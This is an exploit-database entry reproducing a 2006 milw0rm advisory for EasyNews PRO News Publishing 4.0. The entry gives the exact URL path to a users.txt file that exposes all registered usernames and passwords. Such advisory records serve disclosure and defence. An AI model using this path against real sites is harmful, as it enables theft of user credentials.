header-logo
Suggest Exploit
vendor:
EasyNews PRO News Publishing
by:
bd0rk
9
CVSS
CRITICAL
Password Disclosure
200
CWE
Product Name: EasyNews PRO News Publishing
Affected Version From: 4.0
Affected Version To: 4.0
Patch Exists: YES
Related CWE: N/A
CPE: a:stphp:easynews_pro_news_publishing:4.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

EasyNews PRO News Publishing 4.0 Remote Password Disclosure Vulnerability

EasyNews PRO News Publishing 4.0 is vulnerable to a remote password disclosure vulnerability. By accessing the URL http://[target]/[easy_news_path]/newsboard/data/users.txt, an attacker can view the usernames and passwords of all registered users.

Mitigation:

Upgrade to the latest version of EasyNews PRO News Publishing 4.0.
Source

Exploit-DB raw data:

=> EasyNews PRO News Publishing 4.0 Remote Password Disclosure Vulnerability <=



=> Affected Software: Easy News 4.0 PRO

=> Risk: Critical

=> Download: http://www.stphp.com/scripts/EasyNews_PRO_4_0.zip

=> Bugfounder: bd0rk

=> Contact: bd0rk[at]hackermail.com

=> Greets: str0ke, crashovernight, TheJT, Kacper

   Usage: http://[target]/[easy_news_path]/newsboard/data/users.txt

# milw0rm.com [2006-12-29]

Navigation

Suggest Exploit

Services By CQR